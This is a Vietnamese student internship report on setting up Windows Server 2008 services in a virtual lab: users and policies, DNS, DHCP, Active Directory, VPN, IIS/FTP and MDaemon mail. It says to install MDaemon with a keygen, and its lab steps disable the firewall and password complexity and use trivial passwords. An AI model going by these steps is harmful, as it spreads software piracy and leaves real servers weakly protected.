Báo cáo cuối kỳ

Trung Tâm Đào Tạo Quản Trị Mạng Và An Ninh
Mạng Quốc Tế Athena

BÁO CÁO THỰC TẬP CUỐI KHÓA
Đề Tài: Nghiên cứu và triển khai các dịch
vụ trên Windows Server 2008
GVHD: Võ Đỗ Thắng
Sinh viên thục hiện:
- Lý Ngọc Diệp
- Phạm Thị Diễm Kiều
- Nguyễn Thị Tuyết
TP. Hồ Chí Minh, ngày 5 tháng 5 năm 2014

Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
LỜI MỞ ĐẦU
Ngày nay với sự phát triển của khoa học kỹ thuật thì máy tính trở
nên phổ biến với mọi người. Chúng mang lại cho con người khả năng to
lớn và làm những công việc phi thường: tính toán nhanh và chính xác
các bài toán phức tạp, điều khiển tự động, giải trí… Máy tính ra đời
không chỉ hỗ trợ trong sản xuất mà còn trong việc học tập và làm góp
phần giải phóng sức lao động. Máy tính điện tử là một phát minh, thành
tựu to lớn cho sự phát triển của nhân loại góp phần thúc đẩy mạnh mẽ
tiến bộ khoa học và kỹ thuật nói riêng cũng như nhân loại nói chung.
Bên cạnh sự phát triển chóng mặt của máy tính trong thời buổi
công nghệ thông tin thì các ứng dụng, dịch vụ mạng là nền tản không thể
tách rời. Sức mạnh máy tính có thể nhân lên gấp nhiều lần khi được kết
nối thành mạng máy tính. Là cơ sở hạ tần cho phép trao đổi thông tin,
truyền tải dữ liệu từ xa nhằm rút ngắn khoảng cách. Với mạng máy tính
toàn cầu chúng ta dễ dàng tiếp cận với sự phát triển của thế giới trong đó
có sự phát triển gần nhất của Windows Server là Windows Server 2000
và Windows Server 2003 và tiếp đến là Windows Server 2008 hỗ trợ tốt
các dịch vụ mạng cần thiết trên Server, việc cải tiến không ngừng giúp
nâng cao tính ổn định và an toàn hơn cho Windows Server 2008 hoạt
động một cách trơn tru.
Hiện nay quá trình công nghiệp hóa hiện đại hóa đất nước là một
chủ trương hàng đầu của nhà nước. Mạng máy tính trở thành mục tiêu
nghiên cứu và phát triển. Cốt lõi là ngành công nghệ thông tin bao gồm
nhiều lĩnh vực từ kiến trúc mạng đến nguyên lý thiết kế, cài đặt mô hình
ứng dụng v.v… Mạng viễn thông nói chung và mạng máy tính trên nền
tảng Windows Server 2008 nói riêng là công cụ hũu dụng không thể
thiếu trong bộ máy nhà nước, trường học, doanh nghiệp… Nó đóng vai
trò cầu nối trao đổi thông tin giữa các chính phủ, tổ chức xã hội và mọi
người với nhau.
Qua thời gian học tập và nghiên cứu trên ghế nhà trường cùng với
sự hỗ trợ tận tình của Thầy cô, bạn bè và người thân đã giúp em thu thập
được nhiều kiến thức quý báo. Đặc biệt là quá trình thực tập tại Trung
tâm ATHENA giúp em có những trải nghiệm vô cùng thú vị và bổ ích.
Với mong muốn tìm hiểu về mạng máy tính và góp phần xây dựng một
mạng máy tính thân thiện, thông minh cho mọi người sử dụng.
Tuy đã có nhiều cố gắng song không thể tránh những khuyết
điểm, sai sót vì thế mong được sự thông cảm và những ý kiến đóng góp
quý báo từ Quý Thầy Cô, bạn bè, bạn đọc, để em có thể ngày một hoàn
thiện đề tài của mình hơn. Xin chân thành cảm ơn.

LỜI CẢM ƠN
Thực tập là quá trình tham gia học hỏi, so sánh, nghiên cứu và
ứng dụng những kiến thức đã học vào thực tế công việc ở các cơ quan
quản lý hành chính nhà nước và các công việc sau này. Với nhiều kiến
thức còn bỡ ngỡ của một sinh viên năm cuối ,chuyên ngành công nghệ
thông tin trường Đại học Tài Nguyên Và Môi Trường TPHCM ,tôi đã
được tham gia trong suốt quá trình thực tập tại trung tâm Athena. Tại
đây chúng tôi đã nhận được nhiều sự hỗ trợ và giúp đỡ của các bạn bè
đồng nghiệp và đặc biệt là sự tận tình, chu đáo của thầy Võ Đỗ Thắng,
giám đốc Trung tâm đào tạo và quản trị mạng an ninh quốc tế. Cùng với
sự hỗ trợ từ phía nhà trường, xin gởi lời cảm ơn chân thành đến quý thầy
cô khoa công nghệ thông tin trường Đại học Tài Nguyên Và Môi
Trường TPHCM đã tạo điều kiện tốt nhất để chúng tôi hoàn thành khóa
thực tập này.
Với sự nỗ lực của bản thân và sự hỗ trợ giúp đỡ, kiến thức ban
đầu vẫn còn nhiều hạn chế, vì vậy không tránh khỏi những thiếu sót
trong quá trình hoàn thành báo cáo. Mong nhận được nhiều đóng góp ý
kiến của quý thầy cô cũng như nhiều bạn cùng chuyên môn để có thể
nắm vững kiến thức hơn.
Sau cùng, chúng tôi xin kính chúc quý Thầy Cô trong Khoa Công
Nghệ Thông Tin và Thầy Võ Đỗ Thắng lời chúc sức khỏe, niềm tin để
tiếp tục thực hiện sứ mệnh cao đẹp của mình_ truyền đạt kiến thức cho
thế hệ mai sau.
Trân trọng.

NHẬN XÉT CỦA GV
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................
............................................................................................................................................

Mục Lục
CHƯƠNG 1: TỔNG QUAN............................................................................................1
1.1 Giới thiệu về cơ quan thực tập ..............................................................................1
1.1.1 Trụ sở và các chi nhánh Trụ sở chính ............................................................2
1.1.2 Cơ cấu tổ chức................................................................................................2
1.1.3 Cơ sở vật chất.................................................................................................3
1.1.4 Vấn đề cần giải quyết .....................................................................................4
CHƯƠNG 2: KIẾN THỨC CƠ SỞ .................................................................................4
2.1 Lý thuyết.................................................................................................................4
CHƯƠNG 3: PHƯƠNG PHÁP THỰC HIỆN VÀ KẾT QUẢ........................................5
3.1 Phương pháp nghiên cứu........................................................................................5
CHƯƠNG 4: CHI TIẾT KẾT QUẢ.................................................................................5
4.1 LOCAL USER AND GROUP ...............................................................................5
4.2 Local Policy.........................................................................................................12
4.3 Local Security policy...........................................................................................23
4.4 DNS.....................................................................................................................35
4.5 DHCP ..................................................................................................................41
4.6 Domain ................................................................................................................47
4.7 VPN......................................................................................................................56
4.8 IIS ........................................................................................................................71
4.9 Mail Server ..........................................................................................................80
4.10 Khai thác mã lỗi MS10_042..............................................................................94
4.11 Mail Server trên VPS.......................................................................................101
4.12 WINDOWS SERVER BACKUP....................................................................118

Lý Ngọc Diệp - Phạm Thị Diễm Kiều - Nguyễn Thị Tuyết 1
CHƯƠNG 1: TỔNG QUAN
1.1 Giới thiệu về cơ quan thực tập
Giới thiệu công ty
Trung tâm Đào Tạo Quản Trị Mạng và An ninh Mạng Quốc Tế
ATHENA_ Tiền thân là Công ty TNHH Tư vấn và Đào tạo quản trị mạng
Việt Năng, (tên thương hiệu viết tắt là TRUNG TÂM ĐÀO TẠO ATHENA),
được chính thức thành lập theo giấy phép kinh doanh số 4104006757 của Sở
Kế Hoạch Đầu Tư Tp Hồ Chí Minh cấp ngày 04 tháng 11 năm 2008.
Tên công ty viết bằng tiếng nước ngoài: ATHENA ADVICE
TRANINGNETWORK SECURITY COMPANY LIMITED ATHENA.
Là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt
huyết và kinh nghiệm trong lĩnh vực công nghệ thong tin. Với quyết tâm góp
phần vào công cuộc đẩy tiến trình tin học hóa của nước nhà ATHENA đã và
đang tập trung chủ yếu vào các hoạt động sau:

Công tác huấn luyện , quảng bá kiến thức tin học, đặc biệt trong lĩnh
vực mạng máy tính, internet, bảo mật và thương mại điện tử…
Tư vấn và hỗ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt
động sản xuất kinh doanh.
Cung cấp nguồn nhân lực trong lĩnh vực công nghệ thông tin, đặc biệt
là chuyên gia về mạng máy tính và bảo mật mạng đạt trình độ quốc tế cho các
tổ chức, doanh nghiệp có nhu cầu.
Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát
triển cơ sở dữ liệu thong tin về các ứng dụng và sự cố mạng.
Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong
trường hợp xảy ra sự cố máy tính.
1.1.1 Trụ sở và các chi nhánh Trụ sở chính
Trụ sở chính _Trung Tâm Đào Tạo Quản Trị Mạng Và An Ninh Mạng
Quốc Tế ATHENA .
Số 2 Bis Đinh Tiên Hoàng , phường Đa Kao, Tp Hồ Chí Minh , Việt
Nam.
Website :www.athena.com.vn
Điện thoại: (84-8) 38244041
Hotline : 0943 23 00 99
Cơ sở 2_Trung Tâm Đào Tạo Quản Trị Mạng Và An Ninh Mạng Quốc Tế
ATHENA
92 Nguyễn Đình Chiểu, phường Đa Kao, Quận 1, Tp Hồ Chí Minh, Việt
Nam.
Website :www.Athena.Edu.Vn
Điện thoại: (84-8) 2210 3801
Hotline : 0943 111 692
Chi nhánh Nha Trang
+ Điện thoại: 08 3824 4041
+ Fax: 08 39 111 692
+Website: www.athena.edu.vn
+Email: traning@athenavn.com
1.1.2 Cơ cấu tổ chức
Sơ đồ cơ cấu tổ chức
Hình 1.Sơ đồ tổ chức công ty
Cơ cấu tổ chức
Sơ đồ cơ cấu tổ chức
Hình 1.Sơ đồ tổ chức công ty

Sau gần 10 năm hoạt động , nhiều học viên tốt nghiệp trung tâm
ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an
ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin – Bộ Quốc
Phòng, Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các
tỉnh,…
Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương
trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách
Khoa Thành Phố Hồ CHính Minh, Học Viện An Ninh Nhân Dân( Thủ Đức),
Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện
Kỹ Thuật Quân Sự ,......
1.1.3 Cơ sở vật chất
Thiết bị đày đủ và hiện đại
Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những
công nghệ mới nhất.
Phòng máy rộng rãi, thoáng mát.
Giới thiệu về nội dung công việc được giao thực tập
Nội dung cần giải quyết
- Cài đặt windows server 2008
- Nâng cấp Stand Alone thành Domain controller
- Cài đặt windows xp
- Join Domain cho windows xp

- Cài đặt và cấu hình DNS và DHCP
- Tạo user account trên AD, thiết lập Policy cho phép user có quyền thay đổi
giờ hệ thống.
- Dựng hệ thống Multi Master cho Domain controller
- Backup cho Domain controller
- Tìm lỗ hổng của hệ thống
1.1.4 Vấn đề cần giải quyết
Vấn đề đặt ra vẫn cón nhiều khó khăn.Chủ đề đã được nhiều người thực
hiện rất tốt.Chính vì thế, cũng đã gây nhiều áp lực khi thực hiện chủ đề này.
Yêu cầu đặt ra phải được thực hiện rõ ràng, các máy ảo phải được thực
hiện đầy đủ. Các bước thực hiện phải được ghi lại một cách chi tiết.
Phạm vi của đề tài
Vấn đề đặt ra vẫn còn nhiều khó khăn.Chủ đề đã nhiều người thực hiện
rất tốt. Chính vì thế đã gây nhiều áp lực khi thực hiện,đòi hỏi nhiều chuyên
sâu hơn
Yêu cầu đặt ra phải được thực hiện rõ rang,các máy ảo phải được thực
hiện đầy đủ. Các bước thực hiện phải được ghi lại một cách chi tiết
Các bước đã làm được
+ Cài đặt windows server 2008
+ Nâng cấp Stand Alone thành Domain controller
+ Cài đặt windows xp
+ Join Domain cho windows xp
+ Cài đặt và cấu hình DNS và DHCP
+ Tạo user account trên AD, thiết lập Policy
CHƯƠNG 2: KIẾN THỨC CƠ SỞ
2.1 Lý thuyết
Hoạt động mạng máy tính, vận hành hệ thống mạng, giải quyết sự cố
mạng và nắm được các phương pháp để bảo vệ mạng trước trước nguy cơ
virus, worm, trojan, spam. Cũng như các biện pháp chống xâm nhập, ăn cắp
thông tin, phá hoại mạng.
Công việc cần thực hiện chính là nắm được các bước và cách làm để thực
hiện quản trị cách tốt nhất.Biết cách cài đặt máy chủ và client, tìm hiểu nhiều
tài liệu để biết quản trị các hoạt Nắm vững các bước thực hiện trong quản trị
Windows server 2003.
Có khả năng tự thiết lập một mạng máy tính, cấu hình mạng, điều chỉnh
năng hoạt động của mạng.
Kỹ thuật
Hoạch định và chuẩn bị đầy đủ là yếu tố quan trọng quyết định quá trình
cài đặt có thuận lợi hay không.Trước khi cài đặt, bạn phải biết được những gì
cần có để có thể cài đặt thành công và bạn có được tất cả thông tin cần thiết

để cung cấp cho quá trình cài đặt. Để lên kế hoạch cho việc nâng cấp hoặc cài
đặt mới các Server nên tham khảo các hướng dẫn từ Microsoft Windows
Server 2008. Các thông tin biết trước khi nâng cấp hoặc cài mới hệ điều hành:
Phần cứng đáp ứng được yêu cầu của Windows Server 2008.
Làm sao để biết được phần cứng của hệ thống có được Windows Server
2008 có hỗ trợ hay không
Điểm khác biệt giữa cài đặt mới và nâng cấp (upgrade).
Những lựa chọn cài đặt nào thích hợp với hệ thống của bạn, chẳng hạn
chiến lược chia partition đĩa, và bạn sẽ sử dụng hệ thống tập tin nào…
Còn nhiều yêu cầu kĩ thuật sẽ nói trong chương 4
CHƯƠNG 3: PHƯƠNG PHÁP THỰC HIỆN VÀ KẾT QUẢ
3.1 Phương pháp nghiên cứu
- Phương pháp nghiên cứu chính là tìm hiểu các tài liệu, làm theo yêu cầu của
đơn vị thực tập, được hướng dẫn chi tiết cách thức thực hiện.
- Xác định rõ ràng công việc cần thực hiện
- Sắp xếp lịch để thực hiện
- Cần chuẩn bị những gì để đáp ứng yêu cầu mà đề tài nghiên cứu đã đặt ra.
- Cài đặt máy thích hợp để thực hiện
- Chuẩn bị phần cứng , ổ đĩa để đáp ứng cho việc nghiên cứu
- Mô tả chi tiết
- Kết quả chính là các demo chạy chương trình và các bước thực hành, được
quay lại bằng video, sẽ được trình bày cụ thể tại chương 4.
CHƯƠNG 4: CHI TIẾT KẾT QUẢ
4.1 LOCAL USER AND GROUP
Chuẩn bị:
- Máy Window Sever 2008(chưa năng cấp Domain ) Sever 1
NIC:192.168.1.1/24
-Máy Window XP:PC1
NIC 1:192.168.1.2/24

Mô hình
Mục Tiêu bài LAB:
- Tạo local user and group trên máy sever 1
- Mục tiêu cuối cùng:các user có thể đăng nhập vào máy sever 1
LƯU Ý:
- Khi thực hiện trên máy ảo VM-WARE các car mạng sẽ được thiết lập ở chế
độ HOST ONLY
- Nên tắt tính năng window Firewall trên các máy sever và PC
Thực hiện:
- Bước 1( Tạo local user)
Trên máy sever,vào start chọn run rồi gõ lusrmgr.msc để vào local use
and groups:
Trong Local uer and groups,chuột phải vào User chọn New tạo 2 User U1
và U2 với pass là 123abc!!!

Tương tự đối với u2
- Bước 2( Đăng nhập User vừa tạo trên Sever 1)
Đăng nhập vào Sever 1 bằng U 1:

Trong U1,có thể truy cập vào Profile chủa chính mình nhưng không thể
truy cập vào Profile của User khác

- Bước 3( Tạo Local Group và add User vào Group đó)
Trên máy Sever 1,vào start chọn run rồi gõ lusrmgr.msc để vào Local
Group and User Group
Trong Local Group and User Group,chuột phải vào Group chọn New
Group tạo 2 Group ketoan,nhansu rồi chọn Add để thêm U1 vào Group
ketoan và U2 vaog Group nhansu

- Bước 4 Cấu hình cho phép User u1 tự động đăng nhập vào Sever 1 khi khởi
động:
Trên máy Sever1,vào Start chọn run gồi gõ UserPassword2 để vào Users
Accounts
Trong Users Accounts,bỏ check ở phần Users must enter a user name
pasword to use this computer rồi chọn Apply

Sau đó nhập tên User và password muốn đăng nhập tự động vào sever1:
Chọn ok  ok , sau đó Retstart máy để kiểm tra kết quả
4.2 Local Policy
Chuẩn bị:
NIC:192.168.1.1/24
-Máy Window XP:PC1
NIC 1:192.168.1.2/24
Mô hình:
Mục tiêu bài LAB:
Tạo local policy trên máy Sever1 để áp dụng lên từng đối tượng khác
nhau
Mục tiêu cuối cùng:áp dụng các chính sách cho các đối tượng khác nhau

Lưu ý:
Khi thực hiện trên máy ảo VM-WARE các car mạng sẽ được thiết lập ở chế
độ HOST ONLY
Nên tắt tính năng window Firewall trên các máy sever và PC
- Bước 1: Tạo Group Policy Console cho u2, Administrator, Non -
Administrator
Trên máy Sever1,vào Strart chọn run rồi gõ ccm để vào Console1[Console
Root]
Trong Console1[Console Root],chọ File-> Add/Remove Snap-ins

Trong Add/Remove Snap-ins,chọn Group Policy Object rồi chọ Add
Trong Select Group Policy Object,chọn Browes.

Trong Browes for a Group Policy Object rồi chọn sang tab Users để chọn U2:
Thực hiện tương tự đẻ cho group Administrator và Non- Administrator
Sauk hi tạo xong U2, Administrator và Non- Administrator,ta sẽ vào file
rồi chon Save để lưu lại Console này

- Bước 2: Tạo Group Policy để tắt Shutdow Event Trackker trên Sever1 cho
Administrators
Chọn Start-> Run rồi gõ gpedit.msc để vào Local Group Policy Editor
Trong Local Group Policy Editor,chọn Computer Comfiguration-
>Administrative Templates-> System chọn Dislay Shutdow Event Tracker
Trong Dislay Shutdow Event Tracker Properties,check vào Disabled:

Để update Group policy vừa cấu hình,ta vào Start->run gõ cmd. Sau đó gõ
lệnh gpupdate/force:
Test thành công Group Policy vừa tạo:
- Bước 3: Tạo Group Policy không cho Group Non-Administrators truy cập
Control Panel

Trên máy Sver,mở lại Group Policy Cosole đã tạo khi nãy rồi chọn Non-
Administrators Policy
Trong Non-Administrators policy,chọn Use Configuration-
>Administrative Templates->Control Panel chọn Prohibit access to the
Contro Panel:

Trong Prohibit access to the Control Panel Properties,chọn Enabled:
Để update group policy vừa cấu hình,ta vào Start->Run gõ cmd.Sau đó gõ

Test Group Policy vừa tạo bằng cách đăng nhập vào u1 và u3 để kiểm tra
sẽ không thấy Control Panel:
- Bước 4( Cấu hình group policy không hiển thị Recycle Bin khi User u2 đăng
nhập Sever1)
Trên máy Sever1,mở lại Group Policy Console đã tạo khi nảy rồi chọn U2
policy

Trong U2 Policy,chọn User Configuration->Administrative Templates-
>Desktop rồi chọn Remove Recycle Bin icon from desktop:
Trong Remove Recyde Bin icon from desktop properties chọn Enabled:

Để update group policy vừa cấu hình, ta vào start->run gõ cmd. Sau đó gõ
Test Group policy vừa tạo bằng cách đăng nhập vào U2 để kiểm tra sẽ
không thấy icon Recycle Bin

4.3 Local Security policy
Chuẩn bị:
NIC:192.168.1.1/24
- Máy Window XP:PC1
NIC 1:192.168.1.2/24
Mô hình:
Mục Tiêu bài LAB:
- Tạo local Security Policy trên máy Sever1 để áp dụng chính sách cho các
User
- Mục tiêu cuối cùng: Áp dụng được các chính sách an ninh cho các user
Lưu ý
-Khi thực hiện trên máy ảo VM-WARE các car mạng sẽ được thiết lập ở chế
độ HOST ONLY
-Nên tắt tính năng window Firewall trên các máy sever và PC
Thực hiện
- Bước 1: Cho Phép tạo User với password đơn giản
Trên máy Sever1,vào Start chon Run rồi gõ lusrmgr.msc để vào Local Users
and Groups:

Trong Local User And Group, tạo mới User U1,với password đơn giản là
123 sẽ báo lỗi là pasword không đủ độ phức tạp

Trên máy Sever 1, vào Start chọn Run rồi gõ secpol.msc để vào Local
Security Policy
Trong Local Security Policy,chọn Account -> Passwword Policy-
>Password must meet complexity requirements:

Trong Password must meet complexity requirements,chọn Disable,sau đó
Apply rồi ok
Để update security policy vừa cấu hình, ta vào Start->Run gõ gpupdate
/force rồi Enter.
Test Security policy vừa tạo bằng cách tạo lại User lest1 với passwords
đơn giản là 123

-Bước 2: Tạo 1 Security Policy khóa 1 User nếu đăng nhập vào sever1 sai 3
lần
Trong Local Security Policy, chọn Account Policies-> Account Lockout
Policy,tiếp theo ta sẽ cấu hình 3 mục là:Account lockout duration,Account

lockout threshold và Reset account lockout counter after
Trong Account lockout duration Properties( quy định thời gian khóa user
đăng nhập sai 3 lân),gõ số phút mà bạn muốn xóa user vào phần Account is
locked out for:
Trong Reset account lockout counter after ( quy định thời gian reset user đã bị
khóa vào phần Reset account lock out counter after)

Trong Reset account lockout counter after ( quy định thời gian reset user
đã bị khóa do đăng nhập sai 3 lần),gõ số phút mà bạn muốn reset user bị khóa
vào phần Reset account lock out counter after:
Để update security policy vừa cấu hình, ta vào Start->Run gõ
gpupdate/force rồi Enter

Test security vừa tạo bằng cách đăng nhập 1 User sai quá 3 lần và đây là
thông báo lỗi của User lest1
Trong Local User and Group của Administrator,ta sẽ thấy lest1 bị khóa
như sau

-Bước 3:( Tạo Security Policy cho phép tất cả các User đều có quyền tắt
máy)
Đầu tiên ta đăng nhập user1 sẽ không thấy quyền tắt máy

Trên máy sever1 vào Start chọn Run rồi gõ secpol.msc để vào local
Security Policy
Trong Local Security Policy, chọn Local Policies->User Rights
Assignment->Shutdown the systen

Trong Shutdown the system Properties, chọn Add User or Group và ở ô
Enter the object names to select ta gõ Everyone rồi OK-> OK
Để update security policy vừa cấu hình, ta vào Start->Run gõ gpupdate
/force rồi Enter.

Test security policy vừa tạo bằng cách đăng nhập vào 1 user bất kì để
kiểm tra quyền tắt máy:

4.4 DNS
Dịch vụ này giúp các bạn tạo nhiều
Trang web chạy cùng một cổng (80). Đồng thời cung cấp khả năng truy cập
các trang Web bằng tên miền thay cho IP.
- Bước 1: Cài đặt dịch vụ DNS
Start menu > Administrative tools > Server Manager

Chọn DNS Server > Next > Next > Install
-Bước 2: Cấu hình DSN Zones và kiểm tra
Start menu > Administrative Tools > DSN
R-Click Forward Lookup Zone > New Zone…

Click Next
Chọn Primary zone > Next
Click Next

Click Next
Click Next

Click Finish
- Bước 3: Cấu hình Zone

R-Click Zone: athena.edu.vn > New Host (A or AAAA)…
Name: Để trống
IP address: 192.168.1.1 (IP của máy đang chạy IIS)
Ta sẽ kiểm tra bằng cách trên máy sever1 vào Start chọn run gõ cmd

Trên máy Xp ta cũng kiểm tra tương tự
4.5 DHCP
Chuẩn bị:
- Máy Windows Server 2008: Server 1
NIC 1: 192.168.1.1/24
- Máy Windows XP: PC 1
NIC 1: IP nhận động
Mô hình:

Mục tiêu:
- Xây dựng máy chủ dịch vụ cấp phát địa chỉ IP động cho các máy trong
mạng LAN.
Lưu ý:
- Nếu thực hiện trên VW-Ware thì phải tắt tính năng DHCP trong mục Virtual
Network Editor.
- Trong cùng một hệ thống, chỉ sử dụng một DHCP - Server để cấp phát IP.
Thực hiện:
- Bước 1: Cài đặt dịch vụ DHCP trong Server Roles.
Start Menu > Adminsitrative tools > Server Manager
Click Add Roles.

Click chọn DHCP Server > Next

Chọn chính xác card mạng mà ta muốn cấp phát IP thông qua nó! > Next
Thông tin Domain, Primary DNS, Altenate DNS.
Ví dụ: Domain Athena.edu.vn, DNS: 192.168.1.1 > Next

DHCP Scopes > Click Add Scope
Điền thông tin Scope. > OK > Next

IP version 6: Disable > Next > Install > Close
Bước 2: Kiểm tra IP được cấp trên máy Windows XP
IP đã nhận chính xác từ DHCP - Server

4.6 Domain
Chuẩn bị:
- Máy Windows Server 2008 (chưa nâng cấp Domain)
NIC 1: 192.168.1.1/24
NIC 1: 192.168.1.2/24
- Cài Domain Controller trên máy server1 và tiến hành join PC1 vào
domain và đăng nhập
Domain Administrator để sử dụng Administrative Tools cho máy PC1.
- Mục tiêu cuối cùng: cài đặt Domain Controller và join PC1 vào domain
thành công.
Lưu ý:
-Khi thực hiện trên máy ảo VM-ware, các card mạng sẽ thiết lập ở chế độ
HOST ONLY,
-Nên tắt tính năng Windows Firewall trên các máy Server và PC.
Thực Hiện:
-Bước 1: cài đặt Domain Controller trên máy server1:
Trên máy server1, cấu hình Preferred DNS server trên card mạng trỏ về
máy server1(192.168.1.1):

Vào Start -> Run gõ dcpromo để nâng cấp Domain Controller cho máy
server1:

Trong cửa sổ Welcome to the Active Directory Domain Services
Installation Wizard, ta để mặc định rồi chọn Next:
Trong cửa sổ Operating System Compatibility, ta để mặc định rồi chọn
Next:

Trong cửa sổ Choose a Deloyment Configuration, ta chọn Create a new
domain in a new forest rồi chọn Next:

Trong cửa sổ Name the Forest Root Domain, trong phần FQDN of the
forest root domain, ta gõ tên domain muốn đặt cho domain mới rồi chọn Next:

Trong cửa sổ Set Forest Functional Level, tùy theo hệ thống của bạn đang
sử dụng thế hệ
windows server nào mà ta chọn cho phù hợp ở phần Forest functional
level rồi chọn Next:

Trong cửa sổ Additional Domain Controller Options, ta chọn Next. Sau
đó trong phần Active Directory Domain Services Installation Wizard, ta chọn
Yes:
Trong cửa sổ Location for Database, log Files, and SYSVOL, ta chọn
Next để tiếp tục quá trình cài đặt:

Trong cửa sổ Directory Services Restore Mode Administrator Password,
ta gõ password muốn sử dụng để quản trị domain này vào ô Password &
Confirm password rồi chọn Next:
Trong cửa sổ Summary, ta chọn Next:

Sau đó, ta check vào tùy chọn Reboot on completion để hệ thống tự động
restart sau khi hoàn thành quá trình nâng cấp Domain Controller

4.7 VPN
VPN - Client to Site
Chuẩn bị:
NIC 1: 192.168.1.1/24 (NAT)
NIC 2: 10.0.0.1/8 (Host Only)
NIC 1: 192.168.1.2/24 (NAT)
NIC 1: 10.0.0.2/8 (Host only)
Mô hình:
- Cài đặt Routing and Remote Access (LAN routing, VPN)
- Cấu hình VPN cho phép PC 1 có thể truy cập vào máy PC 2.
- Kiểm tra dịch vụ bằng thư mục chia sẻ trên PC 1.
Thực hiện:
Bước 1: Cài đặt Routing and Remote Access
Trên máy Server 1, Server 2 tiến hành cài đặt dịch vụ Routing And
Remote Access.
Vào Start Menu > Administrative Tools > Server Manager bấm vào add
Roles

Chọn Next

Click chọn Network Policy and Access Services. > Next > Next

Click chọn Routing and Remote Access Services. > Next > Install. Click
Close sau khi cài xong.
Bước 2:
Cấu hình Routing and Remote Access. Thực hiện trên Server 1 Vào Start
Menu > Administrative Tools > Routing and Remote Access.
Click phải chuột vào Server > Configure and Enable Routing Remote
Access

c
Click Next

Chọn dòng Custom configuration > Next
Chọn hai mục: VPN Access và LAN routing
> Next > Finish > Start Service

R- Click Server > Propertices
Click chọn: Static address pool > Click Add

Điền range IP:
Start IP address: 192.168.1.50
End IP address: 192.168.1.100
> OK > OK
Bước 3: Tạo tài khoản trên Server và cấp quyền truy cập VPN

Trong nhánh Configuration > Local Users and Group
R-Click vào Users > New User
Điền thông tin user > Create > Close

R-Click vào User vpn > Propertices
Trong thẻ Dial- in Click chọn: Allow access > OK
Bước 4: Tạo kết nối VPN trên máy PC 2:
Trên máy PC 2

Start menu > Settings > Control Panel > Network and internet connection
Chọn mục: Create a connection to the network at your workplace
Chọn mục: Virtual Private Network connection > Next

Điền thông tin công ty: Athena > Next
Điền IP của Server: 10.0.0.1 (Đây là IP NIC 2 của Server 1) > Next

Chọn Add a shorcut to connection to my desktop > Finish
R-Click vào "Athena" chọn Connect

Điền thông tin user name và password > Connect
Trên máy PC 2 tiến hành ping kiểm tra kết nối đến máy PC 1

Tín hiệu phản hồi từ PC 2 là rất tốt.
Bước 5: Share thư mục trên PC 1 và tiến hành truy cập từ PC 2
Share thành công.
Kết thúc phần LAB VPN - Client to Site

4.8 IIS
Chuẩn bị:
Mô hình LAB
Cài đặt dịch vụ IIS trên Windows Server 2008
Ứng dụng dịch vụ IIS để triển khai Web Server và FTP Server
Thực hiện:
Bước 1: Cài đặt IIS

Click Add Roles
Click chọn: Web Server (IIS)

Chọn Add Required Features
Click NEXT > NEXT
Click chọn FTP Publishing Service
Click Add Required Services
Click Next > Install
Bước 2: Tạo một trang Web và kiểm tra

Tạo thư mục chứa trang Web đường dẫn: C:athena
Trong thư mục "C:athena" tạo một File tên: "index.htm"
Edit file này với Notepad và thêm nội dung là:
Welcome to Athena.edu.vn >Save file
Đăng ký trang web này với IIS để truy cập bằng dịch vụ web.
Start menu > Administrative > IIS
R-Click vào Sites > Add Web Site…

Site name: athena
Physical path: C:athena > OK
Lưu ý: Khi thực hiện tạo web site mới trên cùng một cổng 80 thì sẽ bị
trùng với trang Default
Web Site, cho nên ta phải Stop trang Default hoặc xóa nó đi.
Kiểm tra:
Mở trình duyệt Web gỏ vào địa chỉ: 192.168.1.1 để xem kết quả
. Bước 3: Tạo một FTP Site và kiểm tra
Start menu > Administrative tools > IIS

Chọn FTP Sites > Click here to lauch
R-Click FTP Site > New > FTP Site

Click NEXT >
Đặt tên cho FTP Site > Next

Click Next
Chọn Do not isolate users > Next

Chọn đường dẫn thư mục Home của FTP site > Next
READ : Chỉ đọc
WRITE: Cho phép ghi dữ liệu
> Next > Finish

Lưu ý quan trọng:
FTP site mới nếu sử dụng cổng mặc định là 21 thì sẽ bị trùng với các
FTP Site khác cũng
chung cổng 21. Trong cùng một thời điểm chỉ có một FTP site được chạy
trên cùng một cổng.
Kiểm tra: Trên Windows XP - PC 1
Mở trình windows explorer: gỏ vào ô địa chỉ đường dẫn sau để truy cập
FTP Site:
ftp://192.168.1.1
Tạo một thư mục trên FTP Site
4.9 Mail Server
Mail Server chứa mailbox của người dùng. Mail Server nhận mail từ
mail Client gửi đến và đưa vào Mail Server nhận mail từ Mail Host gửi đến và
đưa vào mailbox của người dùng. Người dùng sử dụng NFS (Network File
System) để mount thư mục chứa mailbox trên Mail Serverđể đọc. Nếu NFS
không được hỗ trợ thì người dùng phải login vào Mail Server để nhận

thư.Trong trường hợp Mail Client hỗ trợ POP/IMAP và trên Mail Server cũng
hỗ trợ POP/IMAP thì người dùng có thể đọc thư bằng POP/IMAP.
Cài đặt Mail Mdeamon
-> Next
Để mặc định rồi Next

Tiếp theo ta chọn mục keygen, ta coppy cái key vào Installation Type,sau đó
